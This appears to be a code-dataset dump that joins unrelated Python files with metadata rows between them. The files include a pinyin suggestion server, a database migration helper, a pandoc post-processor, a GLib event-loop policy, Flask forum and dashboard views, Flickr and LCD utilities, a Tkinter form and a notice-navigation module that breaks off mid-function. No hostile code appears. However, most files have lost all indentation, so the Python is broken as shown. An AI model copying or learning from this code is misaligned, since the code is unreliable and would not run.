sys.exit(-1)
prefix = fields[0]
tids = []
for i in range(1, len(fields)):
tids.append(int(fields[i]))
self._h_prefix2tids[prefix] = tids
ifile.close()
sys.stderr.write('[trace] done:%s, %d lines\n' % (ifilename, line_no))
def load_index(self):
'''
load index-dicts
'''
self.load_item_set()
self.load_prefix_index()
def get_sugg(self, prefix):
'''
get suggestion-list according to a certain prefix
'''
sugg_info = {}
sugg_info['prefix'] = prefix
sugg_info['sugg'] = []
if len(prefix) == 0:
return sugg_info
py_flag = False
if not prefix in self._h_prefix2tids:
if sugg_conf.ifPY == 1:
py = lazy_pinyin(prefix.decode(sugg_conf.encoding))
py_str = (''.join(py)).encode(sugg_conf.encoding)
if not py_str in self._h_prefix2tids:
return sugg_info
### as an alternate, use py_str as prefix
prefix = py_str
py_flag = True
else:
return sugg_info
tids = self._h_prefix2tids[prefix]
for tid in tids:
if not tid in self._h_tid2item:
continue
item = self._h_tid2item[tid]
sugg_item = {
'text' : item['text'],
'score' : item['score'],
'att' : item['att'],
}
sugg_info['sugg'].append(sugg_item)
return sugg_info
def init(self):
'''
init
'''
sys.stderr.write('[trace] init\n')
self.load_index()
def run(self):
'''
dispatch commands
'''
if len(sys.argv) < 2:
sys.stderr.write('[ERROR] no command\n')
sys.exit(-1)
sys.stderr.write('[trace] begin to run command: %s\n' % sys.argv[1])
if sys.argv[1] == 'build_item_set':
self.build_item_set()
elif sys.argv[1] == 'gen_tag2tid':
self.load_item_set()
self.gen_tag2tid()
elif sys.argv[1] == 'gen_prefix2tid':
self.gen_prefix2tid()
else:
sys.stderr.write('[ERROR] unknown command: %s\n' % sys.argv[1])
sys.exit(-1)
sys.stderr.write('[trace] done.\n')
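# Illustrative note (not part of the original file): once init() has loaded the
# prefix index, lookups return a plain dict, e.g.
#
#     server = SuggServer()
#     server.init()
#     server.get_sugg('bei')
#     # -> {'prefix': 'bei', 'sugg': [{'text': ..., 'score': ..., 'att': ...}, ...]}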
if __name__ == '__main__':
server = SuggServer()
server.init()
server.run()
| mit | -174,198,553,257,588,670 | 19.550802 | 84 | 0.590684 | false | 2.54672 | false | false | false |
mdg/pygrate | pygration/db.py | 1 | 2877 | import sqlalchemy
from sqlalchemy import Column, Integer, String
from sqlalchemy.orm import mapper, sessionmaker
import subprocess
class PygrationState(object):
'''Python object representing the state table'''
def __init__(self, migration=None, step_id=None, step_name=None):
self.migration = migration
self.step_id = step_id
self.step_name = step_name
self.sequence = None
self.add_state = None
self.simdrop_state = None
self.drop_state = None
def __repr__(self):
return "<PygrationState(%s, %s)>" % (self.migration, self.step_id)
class Table(object):
metadata = sqlalchemy.MetaData()
engine = None
pygration_state = None
@classmethod
def define(cls, schema=None):
cls.pygration_state = sqlalchemy.Table('pygration_state', cls.metadata
, Column('migration', String(length=160), primary_key=True)
, Column('step_id', String(length=160), primary_key=True)
, Column('step_name', String(length=160))
, Column('sequence', Integer)
, Column('add_state', String(length=16))
, Column('simdrop_state', String(length=16))
, Column('drop_state', String(length=16))
, schema=schema
)
class FileLoader(object):
'''Object for running SQL from a file on the file system'''
def __init__(self, binary, args = [], formatting_dict = {}):
self._binary = binary
self._args = [arg.format(filename="{filename}", **formatting_dict) for arg in args]
def __call__(self, filename):
args = [arg.format(filename=filename) for arg in self._args]
print self._binary, args
subprocess.check_call([self._binary] + args)
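# Illustrative sketch (not part of the original module): a FileLoader wired up for
# psql. The binary path and flags are assumptions; "{filename}" is substituted on
# each call, while the other placeholders are filled at construction time.
def _example_psql_loader(database='mydb'):
    return FileLoader('/usr/bin/psql',
                      ['-d', '{database}', '-f', '{filename}'],
                      {'database': database})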
def open(url=None, drivername=None, schema=None, username=None,
password=None, host=None, port=None, database=None, query=None):
"""Open the DB through a SQLAlchemy engine.
Returns an open session.
"""
if url is None and drivername is None:
raise Exception("Either a url or a driver name is required to open a db connection")
if url is None:
url = sqlalchemy.engine.url.URL(drivername = drivername,
username = username,
password = password,
host = host,
port = port,
database = database,
query = query)
Table.engine = sqlalchemy.create_engine(url)
Table.metadata.bind = Table.engine
Session = sessionmaker()
Session.configure(bind=Table.engine)
session = Session()
Table.define(schema)
mapper(PygrationState, Table.pygration_state)
return session
| apache-2.0 | 1,958,043,424,474,704,400 | 34.518519 | 92 | 0.57838 | false | 4.37234 | false | false | false |
balachia/pandoc-filters | pandoc-postprocess.py | 1 | 3430 | # post-process tex files, looking for
# "%% @..." directives
import sys
import codecs
import re
debug = 0
verbose = True
# define processors
class PostProcessor:
def process_line(self, line):
return (line, False)
class ReplaceNextEnvironment(PostProcessor):
def __init__(self, args):
self.opened1 = False
self.openenv = 0
self.target = args[0]
self.replacement = args[1]
self.targeto = re.compile(r'\\begin{' + args[0] + '}', re.U)
self.targetc = re.compile(r'\\end{' + args[0] + '}', re.U)
def process_line(self, line):
reso = self.targeto.match(line)
resc = self.targetc.match(line)
#print("RNE :: " + line + str(reso) + str(resc) +
#str(self.targeto.pattern))
res = (line, False)
if reso:
if not self.opened1:
self.opened1 = True
line = self.targeto.sub(r'\\begin{' + self.replacement +
'}',line)
res = (line, False)
self.openenv += 1
if resc:
if self.opened1:
self.openenv -= 1
if self.openenv == 0:
line = self.targetc.sub(r'\\end{' + self.replacement +
'}',line)
res = (line, True)
return res
# set up processor dict
processor_dict = dict()
processor_dict['replace-next-environment'] = ReplaceNextEnvironment
ppdirective_re = re.compile(r'^%% @(\S+) (.*)')
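# Illustrative example (not in the original script): a directive as it would appear
# in the .tex source being post-processed. The environment names are made up.
#
#     %% @replace-next-environment longtable tabular
#
# ppdirective_re captures ('replace-next-environment', 'longtable tabular'), which
# instantiates ReplaceNextEnvironment(['longtable', 'tabular']) in main() below.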
def main():
# announce
if verbose:
print('Python Pandoc Postprocessor')
# read args
args = sys.argv
if len(args) == 1:
raise SystemExit('No arguments supplied')
else:
infile = args[1]
# announce
if verbose:
print('\tProcessing: %s' % infile)
# read in file, lazy as hell
with codecs.open(infile, mode='r', encoding='utf8') as fin:
lines = [line.strip() for line in fin]
if debug > 0:
print(lines)
processors = list()
outlines = list()
for line in lines:
res = ppdirective_re.match(line)
if debug > 0:
print(line)
# check for new processors
if res:
directive = res.groups()[0]
dir_args = [x.strip() for x in (res.groups()[1]).split()]
processors.append(processor_dict[directive](dir_args))
if debug > 0:
print('\tDIRECTIVE: %s, ARGS: %s' % (directive, dir_args))
continue
elif debug > 1:
print('\t(NO DIRECTIVE)')
# run the processors
drop_processor = list()
for processor in processors:
res = processor.process_line(line)
line = res[0]
drop_processor.append(res[1])
if debug > 1:
print(" ==> " + str(line))
outlines.append(line)
if debug > 1:
print(processors)
# drop any finished processors
processors = [processors[i] for i in range(len(processors)) if not
drop_processor[i]]
if debug > 1:
print(processors)
# write everything out
if debug > 0:
print(outlines)
with codecs.open(infile, mode='w', encoding='utf8') as fout:
for line in outlines:
fout.write(line + "\n")
if verbose:
print('\tPPP done!')
if __name__ == "__main__":
main()
| gpl-3.0 | -8,395,575,494,031,921,000 | 24.597015 | 74 | 0.523615 | false | 3.832402 | false | false | false |
jdber1/opendrop | opendrop/vendor/aioglib/_policy.py | 2 | 1951 | import asyncio
from gi.repository import GLib
import threading
from typing import MutableMapping
import sys
import weakref
from ._loop import GLibEventLoop
__all__ = [
'GLibEventLoopPolicy',
]
class GLibEventLoopPolicy(asyncio.AbstractEventLoopPolicy):
class _ThreadLocalVariable(threading.local):
value = None
def __init__(self) -> None:
self._set_loops_lock = threading.Lock()
self._set_loops = weakref.WeakValueDictionary() # type: MutableMapping[GLib.MainContext, GLibEventLoop]
self._last_accessed_loop = __class__._ThreadLocalVariable()
def get_event_loop(self) -> GLibEventLoop:
context = self._get_current_context()
with self._set_loops_lock:
try:
loop = self._set_loops[context]
except KeyError:
loop = GLibEventLoop(context)
self._set_loops[context] = loop
self._last_accessed_loop.value = loop
return loop
def set_event_loop(self, loop: GLibEventLoop) -> None:
context = self._get_current_context()
if loop.context != context:
raise ValueError("Loop has a different context")
with self._set_loops_lock:
self._set_loops[context] = loop
self._last_accessed_loop.value = loop
def new_event_loop(self) -> GLibEventLoop:
context = self._get_current_context()
return GLibEventLoop(context)
def _get_current_context(self) -> GLib.MainContext:
default_context = GLib.MainContext.get_thread_default()
if default_context is None:
default_context = GLib.MainContext.default()
return default_context
if sys.platform != 'win32':
def get_child_watcher(self) -> asyncio.AbstractChildWatcher:
raise NotImplementedError
def set_child_watcher(self, watcher: asyncio.AbstractChildWatcher) -> None:
raise NotImplementedError
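# Illustrative usage sketch (not part of the original module): install the policy so
# asyncio hands out GLib-backed loops. Assumes the aioglib package re-exports
# GLibEventLoopPolicy, as __all__ above suggests.
#
#     import asyncio
#     import aioglib
#
#     asyncio.set_event_loop_policy(aioglib.GLibEventLoopPolicy())
#     loop = asyncio.get_event_loop()   # GLibEventLoop bound to this thread's context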
| gpl-3.0 | -1,136,327,726,012,550,800 | 29.015385 | 112 | 0.643772 | false | 4.064583 | false | false | false |
lepture/june | june/views/topic.py | 1 | 6490 | # coding: utf-8
from flask import Blueprint, g, request, flash
from flask import render_template, redirect, abort, jsonify
from flask import url_for
from flask.ext.babel import gettext as _
from ..helpers import require_user, force_int, limit_request
from ..models import Node, Topic, Reply, Account
from ..models import fill_topics, fill_with_users
from ..forms import TopicForm, ReplyForm
__all__ = ['bp']
bp = Blueprint('topic', __name__)
@bp.route('/')
def topics():
"""
The topics list page.
"""
page = force_int(request.args.get('page', 1), 0)
if not page:
return abort(404)
paginator = Topic.query.order_by(Topic.updated.desc()).paginate(page)
paginator.items = fill_topics(paginator.items)
return render_template('topic/topics.html', paginator=paginator,
endpoint='topic.topics')
@bp.route('/latest')
def latest():
"""
Topics ordered by created time.
"""
page = force_int(request.args.get('page', 1), 0)
if not page:
return abort(404)
paginator = Topic.query.order_by(Topic.id.desc()).paginate(page)
paginator.items = fill_topics(paginator.items)
return render_template('topic/topics.html', paginator=paginator,
endpoint='topic.latest')
@bp.route('/desert')
def desert():
"""
Topics without any replies.
"""
page = force_int(request.args.get('page', 1), 0)
if not page:
return abort(404)
paginator = Topic.query.filter_by(
reply_count=0).order_by(Topic.id.desc()).paginate(page)
paginator.items = fill_topics(paginator.items)
return render_template('topic/topics.html', paginator=paginator,
endpoint='topic.desert')
@bp.route('/create/<urlname>', methods=['GET', 'POST'])
@require_user
def create(urlname):
"""
Create a topic in the node by an activated user.
:param urlname: the urlname of the Node model
"""
node = Node.query.filter_by(urlname=urlname).first_or_404()
if node.role == 'staff' and not g.user.is_staff:
flash(_('You have no permission in this node.'), 'warn')
return redirect(url_for('node.view', urlname=urlname))
if node.role == 'admin' and not g.user.is_admin:
flash(_('You have no permission in this node.'), 'warn')
return redirect(url_for('node.view', urlname=urlname))
form = TopicForm()
if form.validate_on_submit():
topic = form.save(g.user, node)
return redirect(url_for('.view', uid=topic.id))
return render_template('topic/create.html', node=node, form=form)
@bp.route('/<int:uid>', methods=['GET', 'POST'])
def view(uid):
"""
View a topic with the given id.
:param uid: the id of a topic.
"""
if request.method == 'POST':
# record hits
topic = Topic.query.get_or_404(uid)
topic.hits += 1
topic.save()
return jsonify(hits=topic.hits)
page = force_int(request.args.get('page', 1), 0)
if not page:
return abort(404)
topic = Topic.query.get_or_404(uid)
node = Node.query.get_or_404(topic.node_id)
author = Account.query.get_or_404(topic.account_id)
paginator = Reply.query.filter_by(topic_id=uid).paginate(page)
paginator.items = fill_with_users(paginator.items)
form = None
if g.user:
form = ReplyForm()
return render_template(
'topic/view.html', topic=topic, node=node, author=author,
form=form, paginator=paginator
)
@bp.route('/<int:uid>/edit', methods=['GET', 'POST'])
@require_user
def edit(uid):
"""
Edit a topic by the topic author.
:param uid: the id of the topic
"""
topic = Topic.query.get_or_404(uid)
form = TopicForm(obj=topic)
if form.validate_on_submit():
form.populate_obj(topic)
topic.save()
return redirect(url_for('.view', uid=uid))
return render_template('topic/edit.html', topic=topic, form=form)
@bp.route('/<int:uid>/delete', methods=['POST'])
@require_user
def delete(uid):
"""
Delete a topic by the topic author.
"""
#TODO: should we delete the replies of the topic?
password = request.form.get('password')
if not password:
flash(_('Password is required to delete a topic'), 'info')
return redirect(url_for('.view', uid=uid))
if not g.user.check_password(password):
flash(_('Password is wrong'), 'error')
return redirect(url_for('.view', uid=uid))
topic = Topic.query.get_or_404(uid)
topic.delete()
return redirect(url_for('.topics'))
@bp.route('/<int:uid>/move', methods=['GET', 'POST'])
@require_user
def move(uid):
"""
Move a topic to another node.
:param uid: the id of the topic
"""
topic = Topic.query.get_or_404(uid)
if g.user.id != topic.account_id and not g.user.is_staff:
return abort(403)
if request.method == 'GET':
return render_template('topic/move.html', topic=topic)
urlname = request.form.get('node', None)
if not urlname:
return redirect(url_for('.view', uid=uid))
node = Node.query.filter_by(urlname=urlname).first()
if node:
topic.move(node)
flash(_('Move topic success.'), 'success')
else:
flash(_('Node not found.'), 'error')
return redirect(url_for('.view', uid=uid))
@bp.route('/<int:uid>/reply', methods=['POST', 'DELETE'])
@limit_request(5, redirect_url=lambda uid: url_for('.view', uid=uid))
@require_user
def reply(uid):
"""
Reply of the given topic.
* POST: it will create a reply
* DELETE: it will delete a reply
    DELETE requests must pass the reply id as a query argument; a reply can
    only be deleted by its author or by staff members.
:param uid: the id of the topic
"""
if request.method == 'DELETE':
reply_id = force_int(request.args.get('reply', 0), 0)
if not reply_id:
return abort(404)
reply = Reply.query.get_or_404(reply_id)
if not reply:
return abort(404)
if reply.topic_id != uid:
return abort(404)
if g.user.is_staff or g.user.id == reply.account_id:
reply.delete()
return jsonify(status='success')
return abort(403)
topic = Topic.query.get_or_404(uid)
form = ReplyForm()
if form.validate_on_submit():
form.save(g.user, topic)
else:
flash(_('Missing content'), 'error')
return redirect(url_for('.view', uid=uid))
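# Illustrative sketch (not part of the original module): the blueprint above is meant
# to be mounted on the application object; the URL prefix here is an assumption.
#
#     app.register_blueprint(bp, url_prefix='/topic')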
| bsd-3-clause | -4,477,287,090,108,057,000 | 28.634703 | 73 | 0.616949 | false | 3.517615 | false | false | false |
levitte/postrfs | src/util.py | 1 | 4121 | # Postr, a Flickr Uploader
#
# Copyright (C) 2006-2008 Ross Burton <[email protected]>
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51 Franklin
# St, Fifth Floor, Boston, MA 02110-1301 USA
import os
from gi.repository import Gtk, GdkPixbuf
import bsddb3
from twisted.web.client import getPage
from twisted.internet import defer
from twisted.python import log
def greek(size):
"""Take a quantity (like 1873627) and display it in a human-readable rounded
form (like 1.8M)"""
_abbrevs = [
(1 << 50L, 'P'),
(1 << 40L, 'T'),
(1 << 30L, 'G'),
(1 << 20L, 'M'),
(1 << 10L, 'k'),
(1, '')
]
for factor, suffix in _abbrevs:
if size > factor:
break
return "%.1f%s" % (float(size) / factor, suffix)
def get_widget_checked(glade, name):
"""Get widget name from glade, and if it doesn't exist raise an exception
instead of returning None."""
widget = glade.get_object(name)
if widget is None: raise "Cannot find widget %s" % name
return widget
def get_glade_widgets (glade, object, widget_names):
"""Get the widgets in the list widget_names from the GladeXML object glade
and set them as attributes on object."""
for name in widget_names:
setattr(object, name, get_widget_checked(glade, name))
def get_thumb_size(srcw, srch, dstw, dsth):
"""Scale scrw x srch to an dimensions with the same ratio that fits as
closely as possible to dstw x dsth."""
scalew = dstw / float(srcw)
scaleh = dsth / float(srch)
scale = min(scalew, scaleh)
return (int(srcw * scale), int(srch * scale))
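# Illustrative example (not in the original file): an 800x600 source fitted into a
# 100x100 box keeps its aspect ratio.
#
#     >>> get_thumb_size(800, 600, 100, 100)
#     (100, 75)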
def align_labels(glade, names):
"""Add the list of widgets identified by names in glade to a horizontal
sizegroup."""
group = Gtk.SizeGroup()
group.set_mode(Gtk.SizeGroupMode.HORIZONTAL)
widget = [group.add_widget(get_widget_checked(glade, name)) for name in names]
__buddy_cache = None
def get_buddyicon(flickr, data, size=48):
"""Lookup the buddyicon from the data in @data using @flickr and resize it
to @size pixels."""
global __buddy_cache
if __buddy_cache is None:
folder = os.path.join (get_cache_path(), "postr")
if not os.path.exists(folder):
os.makedirs(folder)
path = os.path.join (folder, "buddyicons")
try:
__buddy_cache = bsddb3.hashopen(path, "c")
except bsddb3.db.DBInvalidArgError:
# The database needs upgrading, so delete it
os.remove(path)
__buddy_cache = bsddb3.hashopen(path, "c")
def load_thumb(page, size):
loader = GdkPixbuf.PixbufLoader()
loader.set_size (size, size)
loader.write(page)
loader.close()
return loader.get_pixbuf()
def got_data(page, url, size):
__buddy_cache[url] = page
return load_thumb(page, size)
if int(data.get("iconfarm")) > 0:
url = "http://farm%s.static.flickr.com/%s/buddyicons/%s.jpg" % (data.get("iconfarm"), data.get("iconserver"), data.get("nsid"))
else:
url = "http://www.flickr.com/images/buddyicon.jpg"
if __buddy_cache.has_key(url):
return defer.execute(load_thumb, __buddy_cache[url], size)
else:
deferred = getPage(url)
deferred.addCallback(got_data, url, size)
deferred.addErrback(log.err)
return deferred
def get_cache_path():
"""Return the location of the XDG cache directory."""
return os.environ.get("XDG_CACHE_HOME", os.path.expanduser("~/.cache/"))
| gpl-2.0 | 7,361,009,867,287,362,000 | 33.923729 | 135 | 0.648386 | false | 3.510221 | false | false | false |
caffeinate/test-pylot | pi_fly/web_view.py | 1 | 5556 | '''
Created on 15 Apr 2018
@author: si
'''
from datetime import datetime
from flask import Flask, render_template, current_app, abort, request, make_response, redirect
from flask_sqlalchemy import SQLAlchemy
from pi_fly.actional.abstract import CommsMessage
from pi_fly.devices.abstract import AbstractSensor
from pi_fly.model import Sensor
from pi_fly.web_sessions import valid_session, session_token_create, SESSION_COOKIE_NAME
db = SQLAlchemy()
def create_app(profiles_class, scoreboard):
"""
:param profiles_class (str or class) to Flask settings
:param scoreboard instance of :class:`pi_fly.scoreboard.ScoreBoard`
"""
app = Flask(__name__)
app.config.from_object(profiles_class)
db.init_app(app)
app.sensor_scoreboard = scoreboard
@app.route('/')
def dashboard():
hot_water_sensor_id = "28-0015231007ee"
last_reading = db.session.query(Sensor)\
.order_by(Sensor.last_updated.desc())\
.filter(Sensor.sensor_id == hot_water_sensor_id)\
.first()
if last_reading is None:
return render_template("user_message.html", **{'msg': 'No sensor readings in DB.'})
d = datetime.utcnow() - last_reading.last_updated
minutes_since_reading = d.total_seconds() / 60.
page_vars = {'collection_failure': minutes_since_reading > 10.,
'water_temp': last_reading.value_float,
'bath_possible': last_reading.value_float > 45.,
'last_read_at': last_reading.last_updated,
}
return render_template("dashboard.html", **page_vars)
@app.route('/sensor_scoreboard/')
def sensor_scoreboard():
"""
Show the current values for all input devices in the profile.
"""
# consolidate all sensors on the scoreboard with all input devices listed in
# the profile. Give a warning message when these don't tally.
sensor_values = {k: v for k, v in current_app.sensor_scoreboard.get_all_current_values()}
p = {} # sensor name => {'display_value': '', 'display_class': ''}
for input_device in current_app.config['INPUT_DEVICES']:
assert isinstance(input_device, AbstractSensor)
if input_device.name in sensor_values:
v = sensor_values[input_device.name]
dv = v['value_type'] + ':' + str(v['value_float'])
display = {'display_value': dv,
'display_class': '',
}
p[input_device.name] = display
actional_names = [a.name for a in current_app.config['ACTIONALS']]
for name, values in sensor_values.items():
if name not in p and name not in actional_names:
# in scoreboard but not in config??
p[name] = {'display_value': str(values),
'display_class': 'WARNING',
}
page_vars = dict(sensors=p)
return render_template("sensor_scoreboard.html", **page_vars)
@app.route('/run_command/', methods=['GET', 'POST'])
@valid_session()
def run_actional_command():
"""
GET lists available commands
POST Sends a user selected command to an actional
"""
ac_command = {}
for ac in current_app.config['ACTIONALS']:
ac_command[ac.name] = []
for command_template in ac.available_commands:
cmd_summary = (command_template.command, command_template.description)
ac_command[ac.name].append(cmd_summary)
page_vars = {'actionals_with_commands': ac_command}
if request.method == 'POST':
target_actional = request.values.get('actional_name', None)
target_command = request.values.get('command', None)
if target_actional not in ac_command:
abort(400, "Unknown actional {}".format(target_actional))
try:
actional_comms = scoreboard.get_current_value(target_actional)['comms']
except KeyError:
abort(500, "Actional not found in the scoreboard")
actional_comms.send(CommsMessage(action="command", message=target_command))
msg = "Running....{} .. {}".format(target_actional, target_command)
page_vars['message'] = msg
return render_template("run_command.html", **page_vars)
@app.route('/login/', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
secret_key = current_app.config['SESSION_PASSWORD']
if secret_key is None:
return render_template("user_message.html",
**{'msg': "secret_key hasn't been set."}
), 500
if request.values.get('password', '') != secret_key:
return "Incorrect password", 401
next_hop = request.values.get('next', '')
assert '@' not in next_hop
location = request.host_url + next_hop
response = make_response(redirect(location, code=302))
response.set_cookie(SESSION_COOKIE_NAME,
value=session_token_create(secret_key),
max_age=60 * 60 * 24 * 100, # 100 days
httponly=True
)
return response
return render_template("login.html")
return app
| mit | -6,800,688,278,438,457,000 | 39.26087 | 97 | 0.568754 | false | 4.196375 | true | false | false |
imscs21/myuniv | 1학기/programming/basic/파이썬/파이썬 과제/12/beerclub.py | 1 | 3253 | from tkinter import *
class App(Frame):
def __init__(self, master):
super().__init__(master)
self.pack(padx=20, pady=20)
self.create_widgets()
def create_widgets(self):
Label(self, text="Name").grid(row=0, column=0, sticky=E)
self.name = Entry(self, width=10)
self.name.grid(row=0, column=1)
Label(self, text="Email").grid(row=1, column=0, sticky=E)
self.email = Entry(self, width=10)
self.email.grid(row=1, column=1)
Label(self, text="@smash.ac.kr").grid(row=1, column=2, sticky=W)
self.sex = StringVar()
self.sex.set(None)
Label(self, text="Sex").grid(row=2, column=0, sticky=E)
Radiobutton(self, text='male',
variable=self.sex, value='male'
).grid(row=2, column=1)
Radiobutton(self, text='female',
variable=self.sex, value='female'
).grid(row=2, column=2, sticky=W)
Label(self, text="Favorites").grid(row=3, column=1)
self.lagers = BooleanVar()
Checkbutton(self, text="Lager", variable=self.lagers
).grid(row=4, column=0)
        self.wheatbeer = BooleanVar()
        Checkbutton(self, text="Wheat Beer", variable=self.wheatbeer
).grid(row=4, column=1)
self.pilsners = BooleanVar()
Checkbutton(self, text="Pilsner", variable=self.pilsners
).grid(row=4, column=2)
self.paleales = BooleanVar()
Checkbutton(self, text="Pale Ale", variable=self.paleales
).grid(row=5, column=0)
self.indiapaleales = BooleanVar()
Checkbutton(self, text="India Pale Ale", variable=self.indiapaleales
).grid(row=5, column=1)
self.stouts = BooleanVar()
Checkbutton(self, text="Stout", variable=self.stouts
).grid(row=5, column=2)
Button(self, text="Register",
command=self.write_summary
).grid(row=6, column=0, columnspan=3, sticky=S)
self.summary = Text(self, width=48, height=10, wrap=WORD)
self.summary.grid(row=7, column=0, columnspan=3, sticky=S)
Button(self, text="Quit", command=self.quit
).grid(row=8, column=0, columnspan=3)
def write_summary(self):
summary = "Name: " + self.name.get() + "\n"
summary += "Email: " + self.email.get() + "@smash.ac.kr\n"
summary += "Sex: " + self.sex.get() + "\n"
summary += "Favorites are: "
if self.lagers.get():
summary += "Lagers, "
        if self.wheatbeer.get():
            summary += "Wheat Beers, "
if self.pilsners.get():
summary += "Pilsners, "
if self.paleales.get():
summary += "Pale Ales, "
if self.indiapaleales.get():
summary += "India Pale Ales, "
if self.stouts.get():
summary += "Stouts, "
summary += "..."
self.summary.delete(0.0, END)
self.summary.insert(0.0, summary)
# main
root = Tk()
root.title("SMaSH Beer Club")
root.geometry("400x420")
App(root)
root.mainloop()
| apache-2.0 | 7,817,469,158,976,137,000 | 40.177215 | 80 | 0.536121 | false | 3.370984 | false | false | false |
pelme/pyspresso | src/pyspresso/lcd_buttons.py | 1 | 2997 | from itertools import zip_longest
import threading
import time
from ._vendor.Adafruit_CharLCD import Adafruit_CharLCDPlate, SELECT, RIGHT, DOWN, UP, LEFT
def noop():
pass
class LCDButtons:
_lcd = Adafruit_CharLCDPlate()
_io_lock = threading.Lock()
def __init__(self, *, on_up=noop, on_down=noop, on_left=noop, on_right=noop, on_select=noop):
# Make the equality check fail for every character during the initial update
self._old_rows = [
[object()] * 15,
[object()] * 15,
]
self._cursor_col = -1
self._cursor_row = -1
self._on_up = on_up
self._on_down = on_down
self._on_left = on_left
self._on_right = on_right
self._on_select = on_select
self._thread = threading.Thread(target=self._button_thread_watcher,
name='button poller')
self._thread.start()
def _render(self, *, pid):
def fmt(temp):
if temp is not None:
return '{0:.1f}'.format(temp)
else:
return '-'
return [
'{current} / {target} C'.format(current=fmt(pid.temperature_current), target=fmt(pid.temperature_target)),
'{} %'.format(int(pid.duty_cycle * 100))
]
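    # Illustrative output (editor's note, not part of the original module):
    # given a pid object with temperature_current=93.4, temperature_target=95.0
    # and duty_cycle=0.25, _render returns ['93.4 / 95.0 C', '25 %'].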
def _set_char(self, col_idx, row_idx, char):
if (self._cursor_col, self._cursor_row) != (col_idx, row_idx):
with self._io_lock:
self._lcd.set_cursor(col_idx, row_idx)
self._cursor_col = col_idx
self._cursor_row = row_idx
with self._io_lock:
self._lcd.message(char)
self._cursor_col += 1
def _update_row(self, row_idx, old_row, new_row):
for col_idx, (old_char, new_char) in enumerate(zip_longest(old_row, new_row, fillvalue=' ')):
if old_char != new_char:
self._set_char(col_idx, row_idx, new_char)
def set_temperature_current(self, temperature):
self.temperature_current = temperature
def update_screen(self, **context):
new_rows = self._render(**context)
for row_idx, (old_row, new_row) in enumerate(zip(self._old_rows, new_rows)):
self._update_row(row_idx, old_row, new_row)
self._old_rows = new_rows
def _button_thread_watcher(self):
buttons = [
(SELECT, self._on_select),
(RIGHT, self._on_right),
(DOWN, self._on_down),
(UP, self._on_up),
(LEFT, self._on_left),
]
pressed_buttons = set()
while True:
for button, func in buttons:
with self._io_lock:
is_pressed = self._lcd.is_pressed(button)
if is_pressed:
pressed_buttons.add(button)
elif not is_pressed and button in pressed_buttons:
pressed_buttons.remove(button)
func()
time.sleep(0.1) | gpl-3.0 | 5,132,360,423,351,799,000 | 28.98 | 118 | 0.533867 | false | 3.681818 | false | false | false |
18F/regulations-site | fr_notices/navigation.py | 2 | 8241 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from collections import namedtuple
import logging
import re
from django.core.urlresolvers import reverse
from regulations.generator.toc import fetch_toc
from regulations.views import utils
logger = logging.getLogger(__name__)
class Title(namedtuple('Title', ['full', 'short', 'subtitle'])):
def __new__(cls, full, short=None, subtitle=None):
"""Adds defaults to constructor"""
return super(Title, cls).__new__(cls, full, short, subtitle)
class NavItem(namedtuple(
'NavItem',
['url', 'title', 'markup_id', 'children', 'category', 'section_id'])):
"""Shared data structure to represent entries in the table of contents and
the navigation in the page footer. We may be able to expand this
standardization more broadly than fr_notices, but let's move one step at a
time.
:type title: Title
:type markup_id: str
:type children: potentially empty list
:type category: str or None
:param str section_id: markup id associated with AJAX and other JS;
temporary shim so that we can turn off AJAX per NavItem. Defaults to
copy the markup_id
"""
def __new__(cls, url, title, markup_id, children=None, category=None,
section_id=None):
"""Adds defaults to constructor"""
if children is None:
children = []
if section_id is None:
section_id = markup_id
return super(NavItem, cls).__new__(
cls, url, title, markup_id, children, category, section_id)
# Properties/fns for backwards compatibility
@property
def markup_prefix(self):
return self.title.short
@property
def sub_label(self):
return self.title.subtitle
def _preamble_titles(node):
"""Hack: Split out navigation title and subtitle from a preamble node.
TODO: Emit these fields in a ToC layer in -parser instead
:param node: a preamble Node (i.e. dict)
:return: pair of (title, sub_title) strings"""
marker = node['label'][-1]
prefix = '{}. '.format(marker.lower())
normalized_title = node['title'].lower()
if normalized_title.startswith(prefix):
title, subtitle = node['title'].split('. ', 1)
return Title(node['title'], title, subtitle)
else:
return Title(node['title'], marker, node['title'])
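# Illustrative behaviour (editor's note; the node contents are hypothetical):
#   {'label': ['2015-12345', 'A'], 'title': 'A. Executive Summary'}
#       -> Title(full='A. Executive Summary', short='A', subtitle='Executive Summary')
#   {'label': ['2015-12345', 'I'], 'title': 'Background'}
#       -> Title(full='Background', short='I', subtitle='Background')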
def make_preamble_nav(nodes, depth=1, max_depth=3):
"""Generate NavItems specific to a notice's preamble.
:type nodes: iterable of Node (a dict)
:param int depth: Current nesting depth of navigation elements
:param int max_depth: We'll stop processing once we reach a certain depth
"""
toc = []
have_titles = [n for n in nodes if n.get('title')]
for node in have_titles:
url = reverse('chrome_preamble',
kwargs={'paragraphs': '/'.join(node['label'][:2])})
# Add a hash to a specific section if we're not linking to the
# top-level entry
if len(node['label']) > 2:
url += '#' + '-'.join(node['label'])
markup_id = '{}-preamble-{}'.format(node['label'][0],
'-'.join(node['label']))
if 'intro' in node['label'] or depth == max_depth:
children = []
else:
children = make_preamble_nav(
node.get('children', []),
depth=depth + 1,
max_depth=max_depth)
toc.append(NavItem(
url=url,
title=_preamble_titles(node),
markup_id=markup_id,
children=children
))
return toc
class CFRChangeBuilder(object):
"""Builds the ToC specific to CFR changes from amendment data. As there is
some valuable state shared between amendment processing, we store it all
in an object"""
def __init__(self):
"""version_info structure: {cfr_part -> {"left": str, "right": str}}
e.g. {"111": {"left": "v1", "right": "v2"},
"222": {"left": "vold", "right": "vnew"}}"""
self.cfr_title = self.cfr_part = self.section = None
self.section_titles = {}
self.toc = []
def add_cfr_part(self, doc_number, version_info, amendment):
"""While processing an amendment, if it refers to a CFR part which
hasn't been seen before, we need to perform some accounting, fetching
related meta data, etc."""
part = amendment['cfr_part']
if part not in version_info:
logger.error("No version info for %s", part)
elif self.cfr_part is None or self.cfr_part != amendment['cfr_part']:
meta = utils.regulation_meta(part, version_info[part]['right'])
flat_toc = fetch_toc(part, version_info[part]['right'],
flatten=True)
self.section_titles = {
elt['index'][1]: elt['title']
